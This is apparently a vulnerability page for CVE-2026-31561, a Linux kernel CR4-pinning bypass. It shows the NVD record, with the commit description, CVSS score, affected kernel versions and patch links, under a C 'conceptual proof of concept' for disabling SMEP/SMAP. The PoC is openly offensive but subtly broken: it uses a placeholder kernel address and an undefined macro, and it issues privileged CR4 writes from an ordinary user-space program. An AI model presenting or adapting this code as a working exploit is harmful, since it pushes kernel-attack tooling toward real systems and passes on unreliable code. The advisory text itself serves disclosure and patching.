CVE-2026-31561

/* * Conceptual Proof of Concept for CVE-2026-31561 * This code demonstrates the logic of bypassing CR4 pinning * by manipulating the 'online' bit in kernel memory. * Note: Actual exploitation requires specific kernel offsets and capabilities. */ #include <stdio.h> #include <stdint.h> // Mock address representing the kernel structure holding the 'online' status // In a real scenario, this would be found via kallsyms or memory scanning. volatile uint64_t *cpu_online_mask_ptr = (uint64_t *)0xdeadbeef; // Define CR4 bits #define X86_CR4_SMEP (1UL << 20) #define X86_CR4_SMAP (1UL << 21) // Inline assembly stubs for CR4 manipulation (Architecture specific) static inline unsigned long read_cr4(void) { unsigned long val; asm volatile("mov %%cr4, %0" : "=r"(val)); return val; } static inline void write_cr4(unsigned long val) { asm volatile("mov %0, %%cr4" : : "r"(val)); } void trigger_bypass() { printf("[*] Attempting to bypass CR4 pinning...\n"); // 1. Modify the 'online' bit in writable kernel memory // to make the kernel believe the AP is not online. // This forces the vulnerable code path that disables CR4 pinning. *cpu_online_mask_ptr &= ~(1UL << TARGET_CPU_BIT); printf("[+] 'Online' bit modified. CR4 pinning should be temporarily disabled.\n"); // 2. Now, write to CR4 to disable SMEP/SMAP protection. // This would normally be blocked by the cr4_pinned_mask. unsigned long current_cr4 = read_cr4(); write_cr4(current_cr4 & ~(X86_CR4_SMEP | X86_CR4_SMAP)); printf("[+] SMEP/SMAP disabled via CR4 modification.\n"); printf("[*] Privilege escalation payload can now be executed.\n"); } int main() { // This is a conceptual representation. // Real exploitation involves precise memory addressing and race conditions. trigger_bypass(); return 0; }

{"cve": {"id": "CVE-2026-31561", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-24T15:16:30.500", "lastModified": "2026-04-27T20:30:14.870", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/cpu: Remove X86_CR4_FRED from the CR4 pinned bits mask\n\nCommit in Fixes added the FRED CR4 bit to the CR4 pinned bits mask so\nthat whenever something else modifies CR4, that bit remains set. Which\nin itself is a perfectly fine idea.\n\nHowever, there's an issue when during boot FRED is initialized: first on\nthe BSP and later on the APs. Thus, there's a window in time when\nexceptions cannot be handled.\n\nThis becomes particularly nasty when running as SEV-{ES,SNP} or TDX\nguests which, when they manage to trigger exceptions during that short\nwindow described above, triple fault due to FRED MSRs not being set up\nyet.\n\nSee Link tag below for a much more detailed explanation of the\nsituation.\n\nSo, as a result, the commit in that Link URL tried to address this\nshortcoming by temporarily disabling CR4 pinning when an AP is not\nonline yet.\n\nHowever, that is a problem in itself because in this case, an attack on\nthe kernel needs to only modify the online bit - a single bit in RW\nmemory - and then disable CR4 pinning and then disable SM*P, leading to\nmore and worse things to happen to the system.\n\nSo, instead, remove the FRED bit from the CR4 pinning mask, thus\nobviating the need to temporarily disable CR4 pinning.\n\nIf someone manages to disable FRED when poking at CR4, then\nidt_invalidate() would make sure the system would crash'n'burn on the\nfirst exception triggered, which is a much better outcome security-wise."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.9.1", "versionEndExcluding": "6.12.80", "matchCriteriaId": "AC9469D5-3400-4C2C-A51B-AF83A8E8F623"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.21", "matchCriteriaId": "ED39847A-3B46-4729-B7CA-B2C30B9FA8FE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.11", "matchCriteriaId": "4CA2E747-A9EC-4518-9AA2-B4247FC748B7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.9:-:*:*:*:*:*:*", "matchCriteriaId": "3F2A4A3D-068A-4CF2-A09F-9C7937DDB0A5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "1D2315C0-D46F-4F85-9754-F9E5E11374A6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc7:*:*:*:*:*:*", "matchCriteriaId": "512EE3A8-A590-4501-9A94-5D4B268D6138"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/00d956dafa76f86a73424fe5cce3d604a8be2e4b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/411df123c017169922cc767affce76282b8e6c85", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a6e14114684d2324e5401617d6d01acb4a4e0e22", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d7853d9fe94abf43b46c57b0b7f8418198b7615a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}